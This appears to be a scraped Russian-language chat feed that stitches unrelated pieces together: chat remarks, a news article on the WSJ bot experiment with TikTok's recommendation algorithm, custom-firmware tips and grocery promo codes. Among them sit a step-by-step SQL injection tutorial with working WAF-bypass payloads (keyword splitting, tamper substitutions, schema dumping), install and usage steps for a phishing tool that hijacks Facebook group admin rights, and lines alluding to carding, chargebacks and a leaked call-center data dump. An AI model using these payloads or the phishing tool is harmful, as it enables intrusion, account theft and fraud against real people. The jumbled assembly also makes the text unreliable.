21tw21

кто-то еще сидит в вк? )

уже не работает

Запущенный в 2016 году в Китае сервис коротких видеороликов TikTok за пять лет стал чуть ли не главной социальной сетью мира. На прошлой неделе он преодолел отметку в 3 млрд скачиваний в App Store и Google Play — по этому показателю он уступает только сервисам Facebook. В прошлом году он стал самым скачиваемым мобильным приложением за всю историю, а сейчас им активно пользуются уже более 800 млн человек по всему миру. TikTok — это бесконечная лента коротких видеороликов, которые предлагаются пользователю алгоритмом сервиса. Долгое время разработчик приложения ByteDance держал в тайне все детали работы своего алгоритма, пока в середине прошлого года не раскрыл некоторую общую информацию: нейросеть компании подбирает пользователю контент на основании той информации, которую тот раскрывает о себе в приложении, а также на основании его лайков, шеров, подписок и комментариев под видео. Правда, все это релевантно для любой другой социальной сети, где есть механизм рекомендаций, так что ничего личного ByteDance так и не раскрыл. А потому журналисты The Wall Street Journal (WSJ) провели собственное расследование, чтобы выяснить, что именно стоит за ошеломляющим успехом китайского сервиса и как ему удается не только завлекать новых пользователей, но и удерживать аудиторию всех возрастов. Для этого команда журналистов создала более сотни бот-аккаунтов в TikTok, которые «просмотрели» сотни тысяч видеороликов. Кроме того, газета связалась с нынешними и бывшими руководителями TikTok. И, вопреки рассказам компании о лайках, шерах и комментариях, журналисты выяснили, что алгоритму TikTok важен и нужен всего один критерий, чтобы понять пользователя, а именно — время, которое он тратит на просмотр каждого видеоролика. Создавая бот-аккаунты, журналисты издания приписали каждому из них определенные сферы интересов, но не стали упоминать их в приложении TikTok во время заполнения анкеты. Только имя аккаунта, возраст и геолокацию. А чтобы проверить, как на самом деле работает алгоритм сервиса, запретили ботам оставлять отметки «нравится» под видео или репостить их. Никаких реакций или подписок на каналы — только просмотр. При этом бот мог просматривать «интересные» ему видео по два или несколько раз, а также ставить на них паузу. Таким образом газета отсеяла те критерии, которые упоминались самой ByteDance в качестве определяющих для алгоритма. Для каждого нового пользователя TikTok, созданного WSJ, изначальная подборка видео выглядела примерно одинаково: это были самые популярные видео на сервисе, отобранные командой администраторов TikTok. Среднее количество просмотров у таких роликов — 6,3 млн. Но чем больше просмотров совершает пользователь (в данном случае бот), тем больше ему выпадает видео с небольшим количеством просмотров, зато больше подходящих его сфере интересов. А чтобы полностью понять, что именно хочет пользователь, алгоритму понадобилось менее двух часов. В некоторых случаях разгадать желания бота алгоритму TikTok удавалось и вовсе за первые 40 минут пользования приложением. «Алгоритм TikTok куда более могущественный и может узнать ваши слабости куда быстрее» своих конкурентов на рынке, считает Гийом Шазло, бывший инженер Google, который работал над алгоритмами для YouTube. «На YouTube 70% того, что смотрят люди,— рекомендации алгоритма. Это уже очень много. Но на TikTok все куда хуже: здесь, вероятно, 90–95% того, что видит пользователь, предлагается ему алгоритмом»,— говорит господин Шазло. В ходе эксперимента выяснилось, что искусственный интеллект TikTok, отвечающий за подборку видео для пользователей, всегда сначала начинает демонстрировать человеку (в данном случае боту) ролики на общие темы, стремясь понять, что именно больше подходит конкретному пользователю. Это, например, танцы под музыку, животные, природа или какие-то челленджи. Один из ботов WSJ был запрограммирован на заинтересованность в грустных роликах и видео о депрессии. И ему первый такой ролик попался уже на третьей минуте пользования TikTok. Бот остановился на этом видео и просмотрел его дважды, тем самым дав понять алгоритму, что эта тема интересна. Сам алгоритм ориентируется в своей базе данных по хештегам, авторам каналов, музыкальным трекам и текстовым описаниям к видеороликам. Еще через 23 ролика — это заняло всего четыре минуты — алгоритм выдал боту второй ролик на грустную тематику. При этом между ними алгоритм продолжает вставлять популярные видео на другие тематики, а также ролики от других пользователей из того же региона, что и конкретный бот. Но пару десятков видео спустя алгоритм выдал еще одно грустное видео — о разрыве отношений. После 80 отсмотренных роликов и 15 минут пользования приложением пользователю предлагается посмотреть ролики на смежные темы — о дружбе, отношениях и любви. Но бот начинает помечать их как неинтересные. Его интересуют только видео о неудачных отношениях, разрывах, эмоциональных травмах и психологических расстройствах. И TikTok дает ему это. Всего через полчаса после начала пользования приложением лента бота начинает превращаться в бесконечный поток депрессивных видео — после 278 отсмотренных роликов доля депрессивных достигла 93%. Представительница сервиса заверила журналистов WSJ, что оставшиеся 7% — ролики на другие тематики, которые должны помочь пользователю не только найти другие интересные темы, но и не оказаться слишком глубоко в кроличьей норе. Но эксперимент показал совершенно другую картину. Для депрессивного бота оставшиеся 7% были рекламными объявлениями. При этом в компании отметили, что эксперимент не может отражать реальное положение дел, так как у людей, в отличие от ботов WSJ, обычно несколько сфер интересов. Но на вооружении газеты были и такие боты — все они оказались затянуты в бесконечный поток однотипных видео, максимально точно отвечающих конкретным запросам пользователя. При этом во многих случаях алгоритм заводил ботов с довольно общими и популярными сферами интересов в нишевый контент. «То, что мы видим здесь, очень похоже на работу алгоритма YouTube. Алгоритм узнает, что депрессия может быть использована как инструмент вовлечения, и начинает продвигать, его говорит господин Шазло. В итоге алгоритм выдает пользователю все более экстремальный контент, чтобы заставить человека проводить все больше и больше времени в приложении». Например, тем, кто заинтересован в политике, в итоге начали демонстрировать ролики про теории заговора, а интересующимся отношениями — о самоубийствах или уходе из семьи. Эти ролики просто физически не успевают отсматривать администраторы TikTok, полагаясь на то, что кто-то из пользователей отследит их и пометит как контент, нарушающий правила приложения. «Будь то YouTube, Facebook, TikTok — мы везде взаимодействуем с алгоритмами… Мы тренируем их, а они тренируют нас. Так что мы должны научиться понимать их работу лучше и не позволить им доходить до того, чтобы вредить нашему обществу или отдельным группам людей», подытожил господин Шазло.

Нормальный телефон

а потом домой гости прийдут утром

Лучше кастом чистый накатить ту же линейку там нету сервисов Гугла и более безопасно так как некоторые прошивки берут трафик (собирают данные) анонимно и на некоторых тяжело отрубить полностью А вот линейка самое то Накатил линейку + магиск и кайфуешь

Любители халявы на месте? Тут в сервисе доставки продуктов «Самокат» появились огромные скидки на продукцию «Горячей штучки». Пельмени «Бигбули» Скачиваем приложение Кладем в корзину 8 пачек пельменей —> Добиваем 8₽ любым мелким товаром —> Вводим промокод «PY5H7F» и получаем 600₽ скидки от 1600₽ (работает только на первый заказ) —> Получаем 7.2 кг пельменей за 1000₽ вместо 2864₽! Снэки «Чебупели» Скачиваем приложение —> Кладем в корзину 8 пачек закусок —> Вводим промокод «PY5DLQ» и получаем 300₽ скидки от 700₽ (работает только на первый заказ) —> Получаем 8 пачек снэков за 412₽ вместо 1512₽!

Для начало стоит понимать, что WAF это некое средство защиты для сайта, которое проверяет входящие запросы и фильтрует их. Также разработчик может поставить свои фильтры с помощью PHP кода и регулярных выражений. То-есть в чем задача разработчика, он знает, что хакер использует такие ключевые выражения как: union, select, database, or, and и тому подобное. Проще всего показать суть задачи разраба в текстовом редакторе... То есть заменяем эти слова на пустоту без учета регистра. Получается вот такая "полезная" нагрузка , которая не сработает. Но представим, что разработчик кривой и забыл указать, что без учета регистра заменять. То есть вот так! Тогда мы можем просто написать uNion Select Database, ВЕДЬ SQL язык регистронезавимый. Давайте перейдем к случаю, если регистр отсутствует. Тогда мы можем обойти этот фильтр.То есть , что происходит удаляются слова , верно ? Значит мы можем по сути разбить одно ключевое слово на два и всунуть между ними полное слово. Тогда полное слово заменится на пустоту, произойдет конкатенация ( объединение) строк и запрос сработает. То есть например вот так: И вот что будет: То есть запрос сработает. Мы обошли фильтр:) Полезно знать также аналог дефолтного синтаксиса вашей СУБД ( у меня MySql) например or = || and = %26%26 -- - = ;0x00 database = schema И если наш запрос не срабатывает, то просто меняем синтаксис нашего запроса. Но что делать, если разраб просто запретит использовать пробелы. По сути мы можем использовать sqlmap tamper для обхода WAF, просто подобрав нужный с помощью софта atlas или любого другого, но они не совсем корректно показывают какие тамперы срабатывают, а какие нет. Поэтому нужно учиться самостоятельно. Аналоги пробелов: appendnullbyte.py Function: Space ==> %00 bluecoat.py Function: Space ==> %09 halfversionedmorekeywords.py Function: Space ==> /*!0 space2comment.py Function: Space ==> /**/ space2dash.py Function: Space==> -nVNaVoPYeva% 0A Platform:MSSQL、SQLite space2mssqlblank.py Function: Space ==> %23%0A Platform: Mssql、Mysql space2mysqlblank.py Function: Space ==> %2B, %0D, %0C Platform: Mysql5.1 space2mysqldash.py Function: Space==> –%0A Platform: Mssql、Mysql Вообщем вариантом куча. Приступим к практике. Практика Допустим есть вот такой сайтик и уязвимость в GET параметре. Введем одинарную кавычку, чтобы убедиться в этом:) Попробуем определить кол-во колонок и заодно обрамление , кто не знает , что такое обрамление читайте предыдущую мою статью.Вводим в уязвимый параметр: 'order by 1,2,3,4,5,6,7,8 -- - Можно больше цифр. Что я могу сказать, что блокируется оператор or. Попробуем поменять регистр на Or. Опять мимо. Значит делаем загрузку по-другому 'ooRrder by 1,2,3,4,5,6,7,8 -- - Мы обошли фильтр, но полезная нагрузка не отработала, т.к обрамление подобрано неверно. Меняем запрос на: ') ooRrder by 1,2,3,4,5,6,7,8 -- - Отлично.Что мы узнали? Во первых для всех последующих запросов обрамление будет ') И бд содержит одну колонку, а также блокируется оператор or. Теперь давайте определим название бд. Попробуем вот так: ') union select database() -- - union тоже блочится. Меняем запрос: ') unUNIONion select database() -- - Попробуем определить название таблиц. Как мы знаем union и or ЗАПРЕЩЕНЫ. Поэтому составляем вот такой запрос: ') unUNIONion select table_name from infoorrmation_schema.tables where table_schema = 'Grisha' -- - Если таблиц больше одной , то добавляем limit , Т.К одну таблицу мы получили , то вторую можем получить вот так: ') unUNIONion select table_name from infoorrmation_schema.tables where table_schema = 'Grisha' limit 1,1 -- - Теперь можно получить и название этой одной колонки... ') unUNIONion select column_name from infoORrmation_schema.columns where table_name = 'oORrbuz' -- - У нас есть название бд, таблицы, колонки. Теперь можно и забрать содержимое: ') unUNIONion select id from Grisha.oORrbuz limit 0,1 -- - Что мы узнали для техники UNION: 1) С помощью order by МЫ определяем кол-во колонок в запросе, которые будут использоваться, а в таблице их может быть хоть 100. 2) Кол-во колонок должно совпадать для UNION , если два , то два меньше или больше нельзя, будет ошибка. 3) UNION имеет непредсказуемый вывод и может меняться параметр где угодно.

Разобрался с вбивом или реально "мертва" ?

сам знаешь что работает

Выгрузка с колл-центра конторы которая занимется товаркой

работает же но я на експресе

В этом посте мы рассмотрим, как захватить администратора группы facebook. Инструментом, который мы будем использовать для этого, является faceg. Faceg - это инструмент python, этот инструмент может быть установлен и использован на termux и linux, как он работает, это также инструмент фишинга, с помощью этого инструмента вы должны создать ссылку и отправить её целевому администратору группы facebook. Ваша цель нажмёт на ссылку, которую вы отправили, и вы сможете стать администратором группы. Установка pip install pyshorteners git clone https://github.com/josifkhan/faceg.git cd faceg chmod +x faceg.py pip install -r requirements.txt Теперь выполните файл face.py python После запуска файла faceg.py python вам необходимо ввести идентификатор группы facebook вашей цели и идентификатор вашей группы. Вы можете получить id, вставив целевую группу facebook и ваш facebook url на сайте idlookup Вставьте id и нажмите кнопку Enter, после чего вы получите ссылку, которую необходимо отправить администратору группы. Если ваша цель перейдет по этой ссылке, вы также сможете стать администратором группы.

а какой протокол? ssh шлет

p2p и сейчас актуальная есть минус при оборотах от 200к по карте прилетают чарджи